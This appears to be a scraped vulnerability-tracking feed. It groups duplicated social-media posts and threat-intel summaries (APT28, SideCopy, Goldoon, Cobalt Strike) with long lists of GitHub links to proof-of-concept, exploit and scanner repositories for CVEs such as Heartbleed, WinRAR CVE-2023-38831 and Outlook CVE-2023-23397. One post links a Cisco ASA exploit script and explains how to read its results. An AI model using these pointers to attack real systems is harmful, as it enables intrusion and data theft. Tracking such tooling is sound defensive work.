For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-11-07T02:18:10.590000
2 posts
65 repos
https://github.com/hybridus/heartbleedscanner
https://github.com/wwwiretap/bleeding_onions
https://github.com/anthophilee/A2SV--SSL-VUL-Scan
https://github.com/isgroup/openmagic
https://github.com/0x90/CVE-2014-0160
https://github.com/GeeksXtreme/ssl-heartbleed.nse
https://github.com/DisK0nn3cT/MaltegoHeartbleed
https://github.com/jdauphant/patch-openssl-CVE-2014-0160
https://github.com/DominikTo/bleed
https://github.com/siddolo/knockbleed
https://github.com/mozilla-services/Heartbleed
https://github.com/BelminD/heartbleed
https://github.com/sammyfung/openssl-heartbleed-fix
https://github.com/iwaffles/heartbleed-test.crx
https://github.com/einaros/heartbleed-tools
https://github.com/zouguangxian/heartbleed
https://github.com/cved-sources/cve-2014-0160
https://github.com/amerine/coronary
https://github.com/Saymeis/HeartBleed
https://github.com/hmlio/vaas-cve-2014-0160
https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed
https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin
https://github.com/roganartu/heartbleedchecker-chrome
https://github.com/pierceoneill/bleeding-heart
https://github.com/yryz/heartbleed.js
https://github.com/rouze-d/heartbleed
https://github.com/ice-security88/CVE-2014-0160
https://github.com/cyphar/heartthreader
https://github.com/a0726h77/heartbleed-test
https://github.com/iSCInc/heartbleed
https://github.com/OffensivePython/HeartLeak
https://github.com/cldme/heartbleed-bug
https://github.com/cheese-hub/heartbleed
https://github.com/xlucas/heartbleed
https://github.com/FiloSottile/Heartbleed
https://github.com/fb1h2s/CVE-2014-0160
https://github.com/takeshixx/ssl-heartbleed.nse
https://github.com/xanas/heartbleed.py
https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang
https://github.com/PinkP4nther/Heartbleed_PoC
https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin
https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC
https://github.com/proactiveRISK/heartbleed-extention
https://github.com/timsonner/cve-2014-0160-heartbleed
https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker
https://github.com/ingochris/heartpatch.us
https://github.com/hreese/heartbleed-dtls
https://github.com/Lekensteyn/pacemaker
https://github.com/GuillermoEscobero/heartbleed
https://github.com/obayesshelton/CVE-2014-0160-Scanner
https://github.com/sensepost/heartbleed-poc
https://github.com/vortextube/ssl_scanner
https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx
https://github.com/indiw0rm/-Heartbleed-
https://github.com/ThanHuuTuan/Heartexploit
https://github.com/mpgn/heartbleed-PoC
https://github.com/titanous/heartbleeder
https://github.com/musalbas/heartbleed-masstest
https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS
https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed
https://github.com/undacmic/heartbleed-proof-of-concept
https://github.com/cbk914/heartbleed-checker
https://github.com/pblittle/aws-suture
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-11-05T05:04:43
2 posts
1 repos
@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.
A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."
##updated 2023-10-23T01:15:07.550000
4 posts
43 repos
https://github.com/Mich-ele/CVE-2023-38831-winrar
https://github.com/ameerpornillos/CVE-2023-38831-WinRAR-Exploit
https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT
https://github.com/ruycr4ft/CVE-2023-38831
https://github.com/Maalfer/CVE-2023-38831_ReverseShell_Winrar-RCE
https://github.com/Nielk74/CVE-2023-38831
https://github.com/s4m98/winrar-cve-2023-38831-poc-gen
https://github.com/Fa1c0n35/CVE-2023-38831-winrar-exploit
https://github.com/elefantesagradodeluzinfinita/cve-2023-38831
https://github.com/kehrijksen/CVE-2023-38831
https://github.com/an040702/CVE-2023-38831
https://github.com/K3rnel-Dev/WinrarExploit
https://github.com/ahmed-fa7im/CVE-2023-38831-winrar-expoit-simple-Poc
https://github.com/SugiB3o/Keylog_CVE2023-38831
https://github.com/h3xecute/SideCopy-Exploits-CVE-2023-38831
https://github.com/PascalAsch/CVE-2023-38831-KQL
https://github.com/xaitax/WinRAR-CVE-2023-38831
https://github.com/akhomlyuk/cve-2023-38831
https://github.com/IMHarman/CVE-2023-38831
https://github.com/MortySecurity/CVE-2023-38831-Exploit-and-Detection
https://github.com/80r1ng/CVE-2023-38831-EXP
https://github.com/z3r0sw0rd/CVE-2023-38831-PoC
https://github.com/r1yaz/winDED
https://github.com/BeniB3astt/CVE-2023-38831_ReverseShell_Winrar
https://github.com/youmulijiang/evil-winrar
https://github.com/RomainBayle08/CVE-2023-38831
https://github.com/GOTonyGO/CVE-2023-38831-winrar
https://github.com/thegr1ffyn/CVE-2023-38831
https://github.com/Garck3h/cve-2023-38831
https://github.com/solomon12354/VolleyballSquid-----CVE-2023-38831-and-Bypass-UAC
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
https://github.com/HDCE-inc/CVE-2023-38831
https://github.com/asepsaepdin/CVE-2023-38831
https://github.com/MorDavid/CVE-2023-38831-Winrar-Exploit-Generator-POC
https://github.com/sh770/CVE-2023-38831
https://github.com/malvika-thakur/CVE-2023-38831
https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831
https://github.com/Malwareman007/CVE-2023-38831
https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc
https://github.com/b1tg/CVE-2023-38831-winrar-exploit
https://github.com/MyStuffYT/CVE-2023-38831-POC
https://github.com/xk-mt/WinRAR-Vulnerability-recurrence-tutorial
CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations
By Cluster25 Threat Intel TeamOctober 12, 2023
🔗️ [Duskrise] https://link.is.it/a27zga
##Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.
CVE-2023-38831 Exploited by Pro-Russia Hacking Groups in RU-UA Conflict Zone for Credential Harvesting Operations
By Cluster25 Threat Intel TeamOctober 12, 2023
🔗️ [Duskrise] https://link.is.it/a27zga
##Cyble: Threat Actor profile: SideCopy (note: email paywall)
Cyble provides a threat actor profile of SideCopy, a Pakistani advanced persistent threat (APT) that primarily targeted South Asian countries (India especially). Cyble states that they were exclusively targeting Indian defense forces and armed forces personnel since early 2019. "Notably, nearly all C2 infrastructure is attributed to Contabo GmbH, and network infrastructure has similarities with the Transparent Tribe APT." Cyble describes the cyber kill chain, exploited vulnerabilities (CVE-2023-38831), and known tools used. No IOC.
updated 2023-08-16T18:30:19
2 posts
In light of recent events, probably best to make this ASA vuln public in public interest: https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.
The path exists even with webvpn disabled, it's the host checker.
Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen
Akira and others have been living off this for a while.
##In light of recent events, probably best to make this ASA vuln public in public interest: https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.
The path exists even with webvpn disabled, it's the host checker.
Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen
Akira and others have been living off this for a while.
##updated 2023-08-11T15:15:09.760000
1 posts
2 repos
@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
##updated 2023-08-08T14:22:24.967000
4 posts
2 repos
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-07-13T19:55:55.293000
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##updated 2023-04-27T19:15:14.917000
2 posts
1 repos
https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746
LocalPotato HTTP edition
Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...
🔗️ [Decoder] https://link.is.it/ikv1ph
##LocalPotato HTTP edition
Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...
🔗️ [Decoder] https://link.is.it/ikv1ph
##updated 2023-04-26T19:27:52.350000
6 posts
Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.
#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel
##Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.
#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel
##Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.
#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel
##Fortinet: New "Goldoon" Botnet Targeting D-Link Devices
FortiGuard Labs observed a new botnet (dubbed Goldoon) targeting CVE-2015-2051 (CVSSv2 10.0 critical, disclosed 13 February 2015, added to CISA KEV Catalog 10 Feb 2022) D-Link DIR-645 Router Remote Code Execution Vulnerability. Goldoon botnet activity spiked in April 2024. Fortinet explains the infection chain, from dropper to downloader to Goldoon payload. This article includes C2 communication, attack methods, and IOC.
#Goldoon #DLink #CVE_2015_2051 #botnet #cybercrime #IOC #threatintel
##In their latest article Fortinet's Cara Lin & Vincent Li provide detailed insights into the propagation and actions of the Goldoon botnet targeting D-Link devices vulnerable to CVE-2015-2051. https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices
##In their latest article Fortinet's Cara Lin & Vincent Li provide detailed insights into the propagation and actions of the Goldoon botnet targeting D-Link devices vulnerable to CVE-2015-2051. https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices
##updated 2023-04-11T21:15:13.240000
2 posts
EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955
Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...
🔗️ [Decoder] https://link.is.it/wewm9y
##EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955
Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...
🔗️ [Decoder] https://link.is.it/wewm9y
##updated 2023-04-06T05:08:38
1 posts
6 repos
https://github.com/infobyte/CVE-2023-21036
https://github.com/qixils/AntiCropalypse
https://github.com/frankthetank-music/Acropalypse-Multi-Tool
https://github.com/notaSWE/gocropalypse
@sonia_seddiki explaining the aCropalypse vulnerability in PNG files, at @devoxxfr
Scary 😱
https://www.devoxx.fr/schedule/talk/?id=50194
https://en.wikipedia.org/wiki/ACropalypse
https://www.cve.org/CVERecord?id=CVE-2023-21036
updated 2023-03-29T05:07:23
4 posts
29 repos
https://github.com/tiepologian/CVE-2023-23397
https://github.com/SecCTechs/CVE-2023-23397
https://github.com/ahmedkhlief/CVE-2023-23397-POC
https://github.com/madelynadams9/CVE-2023-23397-Report
https://github.com/securiteinfo/expl_outlook_cve_2023_23397_securiteinfo.yar
https://github.com/moneertv/CVE-2023-23397
https://github.com/Zeppperoni/CVE-2023-23397-Patch
https://github.com/vlad-a-man/CVE-2023-23397
https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY
https://github.com/ducnorth2712/CVE-2023-23397
https://github.com/alicangnll/CVE-2023-23397
https://github.com/djackreuter/CVE-2023-23397-PoC
https://github.com/api0cradle/CVE-2023-23397-POC-Powershell
https://github.com/Trackflaw/CVE-2023-23397
https://github.com/ka7ana/CVE-2023-23397
https://github.com/Pushkarup/CVE-2023-23397
https://github.com/BronzeBee/cve-2023-23397
https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook
https://github.com/j0eyv/CVE-2023-23397
https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT
https://github.com/im007/CVE-2023-23397
https://github.com/jacquesquail/CVE-2023-23397
https://github.com/grn-bogo/CVE-2023-23397
https://github.com/alsaeroth/CVE-2023-23397-POC
https://github.com/TheUnknownSoul/CVE-2023-23397-PoW
https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell
U.S. Department of State: The United States Condemns Malicious Cyber Activity Targeting Germany, Czechia, and Other EU Member States
The United States joins Germany and Czech Republic in condemning Russian Federation and APT28 for the 2023 cyberattacks against Germany, Czechia, Lithuania, Poland, Slovakia, and Sweden. "Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States."
The U.S. State Department is the only goverment agency that discloses the "previously unknown" Outlook vulnerability as CVE-2023-23397.
h/t @w7voa
#Czech #Germany #CzechRepublic #Russia #cyberespionage #APT28 #news #CVE_2023_23397 #vulnerability #eitw #Outlook #USStateDept
##The Guardian: Germany summons Russian envoy over 2023 cyber-attacks
Germany attributed a series of cyberattacks against the defense and technology sector in 2023 to Russian military intelligence, specifically APT28. APT28, aka Forest Blizzard, and Fancy Bear, is attributed to the Russian Main Intelligence Directorate (GRU) Military Unit 26165 by the U.S. Government. "It exploited a then unknown vulnerability in the Microsoft Outlook email service and, according to German officials, compromised the servers of affected companies." While the Guardian doesn't identify the Outlook vulnerability, it is likely CVE-2023-23397 (9.8 critical, disclosed 14 March 2023 by Microsoft as an exploited zero-day, added to KEV Catalog same day) which Microsoft linked its exploitation to APT28.
#Germany #Russia #APT28 #ForestBlizzard #cyberespionage #CVE_2023_23397 #news
##U.S. Department of State: The United States Condemns Malicious Cyber Activity Targeting Germany, Czechia, and Other EU Member States
The United States joins Germany and Czech Republic in condemning Russian Federation and APT28 for the 2023 cyberattacks against Germany, Czechia, Lithuania, Poland, Slovakia, and Sweden. "Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States."
The U.S. State Department is the only goverment agency that discloses the "previously unknown" Outlook vulnerability as CVE-2023-23397.
h/t @w7voa
#Czech #Germany #CzechRepublic #Russia #cyberespionage #APT28 #news #CVE_2023_23397 #vulnerability #eitw #Outlook #USStateDept
##The Guardian: Germany summons Russian envoy over 2023 cyber-attacks
Germany attributed a series of cyberattacks against the defense and technology sector in 2023 to Russian military intelligence, specifically APT28. APT28, aka Forest Blizzard, and Fancy Bear, is attributed to the Russian Main Intelligence Directorate (GRU) Military Unit 26165 by the U.S. Government. "It exploited a then unknown vulnerability in the Microsoft Outlook email service and, according to German officials, compromised the servers of affected companies." While the Guardian doesn't identify the Outlook vulnerability, it is likely CVE-2023-23397 (9.8 critical, disclosed 14 March 2023 by Microsoft as an exploited zero-day, added to KEV Catalog same day) which Microsoft linked its exploitation to APT28.
#Germany #Russia #APT28 #ForestBlizzard #cyberespionage #CVE_2023_23397 #news
##updated 2023-02-03T05:02:37
15 posts
@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.
To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
##Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel
##Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) https://www.helpnetsecurity.com/2024/04/23/cve-2022-38028-exploits/ #cyberespionage #Don'tmiss #Microsoft #Hotstuff #exploit #Windows #0-day #News #APT #CVE
##The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
##@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:
##Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
@dangoodin Should your post read CVE-2022-38028?
##Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-38028
##Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
cc: @serghei @campuscodi @briankrebs @jwarminsky
#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg
##@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.
To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
##Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗https://www.cisa.gov/news-events/alerts/2024/04/23/cisa-adds-one-known-exploited-vulnerability-catalog
#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel
##The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
##@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:
##Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
@dangoodin Should your post read CVE-2022-38028?
##Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-38028
##Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
cc: @serghei @campuscodi @briankrebs @jwarminsky
#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg
##updated 2023-02-02T05:01:39
4 posts
9 repos
https://github.com/rxwx/CVE-2017-8570
https://github.com/sasqwatch/CVE-2017-8570
https://github.com/erfze/CVE-2017-8570
https://github.com/Drac0nids/CVE-2017-8570
https://github.com/5l1v3r1/rtfkit
https://github.com/erfze/CVE-2017-0261
https://github.com/MaxSecurity/Office-CVE-2017-8570
The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. https://www.darkreading.com/cyberattacks-data-breaches/military-tank-manual-zero-day-ukraine-cyberattack
##Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.
#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570
##updated 2023-02-01T05:05:19
2 posts
28 repos
https://github.com/joshuavanderpoll/CVE-2021-3129
https://github.com/hupe1980/CVE-2021-3129
https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129
https://github.com/Axianke/CVE-2021-3129
https://github.com/SNCKER/CVE-2021-3129
https://github.com/ambionics/laravel-exploits
https://github.com/nth347/CVE-2021-3129_exploit
https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner
https://github.com/ajisai-babu/CVE-2021-3129-exp
https://github.com/zhzyker/CVE-2021-3129
https://github.com/zhzyker/vulmap
https://github.com/withmasday/CVE-2021-3129
https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A
https://github.com/idea-oss/laravel-CVE-2021-3129-EXP
https://github.com/miko550/CVE-2021-3129
https://github.com/JacobEbben/CVE-2021-3129
https://github.com/0nion1/CVE-2021-3129
https://github.com/simonlee-hello/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
https://github.com/qaisarafridi/cve-2021-3129
https://github.com/MadExploits/Laravel-debug-Checker
https://github.com/cuongtop4598/CVE-2021-3129-Script
https://github.com/qaisarafridi/cve-2021-31290
https://github.com/knqyf263/CVE-2021-3129
https://github.com/shadowabi/Laravel-CVE-2021-3129
https://github.com/keyuan15/CVE-2021-3129
Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
